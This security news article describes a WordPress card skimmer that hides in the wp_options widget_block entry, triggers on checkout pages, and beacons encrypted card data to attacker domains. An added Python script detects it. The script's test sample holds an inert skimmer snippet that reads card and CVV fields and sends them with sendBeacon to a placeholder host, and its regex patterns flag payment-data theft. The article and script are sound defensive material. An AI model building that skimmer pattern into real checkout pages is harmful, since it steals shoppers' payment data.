A new breed of credit card skimming malware has been discovered, targeting WordPress checkout pages with alarming sophistication. Puja Srivastava, a Security Analyst at Sucuri, highlights the stealthy tactics employed by this malware, emphasizing its ability to evade detection and silently siphon sensitive payment details.
Unlike traditional attacks that compromise themes or plugins, this malware embeds itself within the WordPress database. Specifically, it uses the wp_options table, injecting obfuscated JavaScript into the widget_block entry, the option that stores the site's Custom HTML block widgets, so the script is rendered wherever those widgets appear. Srivastava explains, “By injecting itself into the database rather than theme files or plugins, the malware avoids detection by common file-scanning tools. This allows it to persist quietly on compromised WordPress sites.”
Once activated, the malware targets checkout pages, either hijacking existing payment forms or dynamically creating fake forms to deceive users into providing their payment details.
The malware checks the current URL and runs only on pages whose address contains “checkout”, so it stays inert, and far less likely to be noticed, on the rest of the site. On checkout pages it captures sensitive data such as credit card numbers, CVVs, and billing addresses in real time as they are typed.
“If a legitimate payment form is already on the page, the script captures data entered into these fields in real time,” Srivastava notes.
To exfiltrate the stolen data, the malware applies Base64 encoding and AES-CBC encryption so the payload is not readable in plain form during transit; because the encryption runs in the victim's browser, however, the key material has to be available to the script, and an analyst who recovers it can decode the traffic. The data is silently sent to attacker-controlled domains like valhafather[.]xyz and fqbe23[.]xyz using the navigator.sendBeacon function, an asynchronous, fire-and-forget request that does not delay form submission or page navigation and therefore causes no visible disruption to the user.
This attack is particularly dangerous because it leaves the legitimate checkout flow intact: the order goes through as normal, so neither the visitor nor the merchant sees anything unusual. Srivastava warns, “What makes it especially deceptive is that it operates in the background without affecting the normal checkout process.”
Such stolen information is often used for fraudulent transactions or sold on underground markets, exacerbating the impact of the breach.
Sucuri’s SiteCheck tool has been updated to detect this malware, flagging it as malware.magento_shoplift.273. Srivastava recommends administrators inspect Custom HTML Widgets in WordPress for suspicious scripts:
- Log into your WordPress admin panel.
- Navigate to wp-admin > Appearance > Widgets.
- Check all Custom HTML block widgets for unfamiliar <script> tags.
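The admin-panel check above is the quickest route, but the article's point is that the script lives in the database, so it is worth inspecting the raw widget_block value as well, in case the admin UI is itself tampered with or the site is being reviewed offline from a database dump. The following Python script is an added example, not code from Sucuri or from this article: it parses the PHP-serialized array WordPress stores in wp_options.widget_block and scores each Custom HTML block against the indicators the article describes (an inline script, a “checkout” URL gate, navigator.sendBeacon, Base64 or AES use, payment-field names). The sample value, the host example.invalid and the scoring rule are constructed for illustration; the real skimmer is obfuscated and will not match these strings as plainly, so treat the output as a triage aid rather than a verdict.

```python
import re
import sys

# Indicators drawn from the behaviour the article describes. Constructed for
# triage only; an obfuscated skimmer may hide several of these strings.
INDICATORS = {
    "inline_script": re.compile(rb"<script\b", re.I),
    "checkout_gate": re.compile(rb"checkout", re.I),
    "beacon_exfil": re.compile(rb"sendBeacon"),
    "base64_use": re.compile(rb"\batob\b|\bbtoa\b|base64", re.I),
    "aes_use": re.compile(rb"AES-CBC|crypto\.subtle", re.I),
    "payment_fields": re.compile(rb"\b(?:card|cvv|cvc)\b|expir|billing", re.I),
}

# One block-widget instance inside widget_block looks like:
#   i:<id>;a:1:{s:7:"content";s:<byte length>:"<block HTML>";}
ENTRY = re.compile(rb'i:(\d+);a:1:\{s:7:"content";s:(\d+):"')


def php_serialize_widget_block(blocks: dict) -> bytes:
    """Build a widget_block value the way WordPress stores it (PHP serialize()),
    so the constructed sample below carries correct byte lengths."""
    def s(text: str) -> bytes:
        raw = text.encode()
        return b's:%d:"%s";' % (len(raw), raw)
    entries = b"".join(b'i:%d;a:1:{%s%s}' % (wid, s("content"), s(html))
                       for wid, html in blocks.items())
    # WordPress appends a _multiwidget marker and counts it in the array size.
    return b'a:%d:{%s%si:1;}' % (len(blocks) + 1, entries, s("_multiwidget"))


def widget_block_entries(option_value: bytes):
    """Yield (widget_id, html) per block widget, slicing by the declared byte
    length so quotes, semicolons or entry-like text inside the HTML can neither
    truncate an entry nor fake one."""
    pos = 0
    while (m := ENTRY.search(option_value, pos)):
        wid, length = int(m.group(1)), int(m.group(2))
        start = m.end()
        yield wid, option_value[start:start + length]
        pos = start + length


def verdict(indicators: list) -> str:
    """Constructed scoring rule: a URL gate plus an encoding/exfil marker inside
    an inline script is the pattern the article describes."""
    if "inline_script" not in indicators:
        return "clean"
    if "checkout_gate" in indicators and {"beacon_exfil", "base64_use", "aes_use"} & set(indicators):
        return "skimmer-like"
    return "review"  # any inline <script> in a widget deserves a look


def scan_widget_block(option_value: bytes) -> list:
    results = []
    for wid, html in widget_block_entries(option_value):
        hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
        results.append({"widget_id": wid, "indicators": hits, "verdict": verdict(hits)})
    return results


# Constructed sample: one plain HTML widget, one harmless inline script, and an
# inert stand-in for the injected skimmer (same shape: URL gate, field read,
# encoding, sendBeacon to an attacker host; no working payload).
SAMPLE_WIDGET_BLOCK = php_serialize_widget_block({
    2: '<!-- wp:html --><p>Free shipping on orders over $50.</p><!-- /wp:html -->',
    3: '<!-- wp:html --><script>document.getElementById("year").textContent='
       'new Date().getFullYear();</script><!-- /wp:html -->',
    4: '<!-- wp:html --><script>if(location.href.indexOf("checkout")>-1){'
       'var p={cc:cc.value,cvv:cvv.value};'
       'navigator.sendBeacon("https://example.invalid/collect",btoa(JSON.stringify(p)));}'
       '</script><!-- /wp:html -->',
})

if __name__ == "__main__":
    # Pass a file holding the raw option_value to scan a real site; otherwise the sample runs.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_WIDGET_BLOCK
    for r in scan_widget_block(blob):
        print(f"widget {r['widget_id']:>3}  {r['verdict']:<13} {', '.join(r['indicators']) or '-'}")
```

To run it against a live site, dump the option first, for example with WP-CLI: wp db query "SELECT option_value FROM wp_options WHERE option_name='widget_block'" --skip-column-names > widget_block.txt (adjust the table prefix if the site does not use the default wp_), then pass that file as the script's argument. The length-honouring parse matters: a skimmer's content can contain quotes and semicolons that would break a naive split on delimiters. And whatever the score, an inline script you did not put in a widget yourself is the thing to remove.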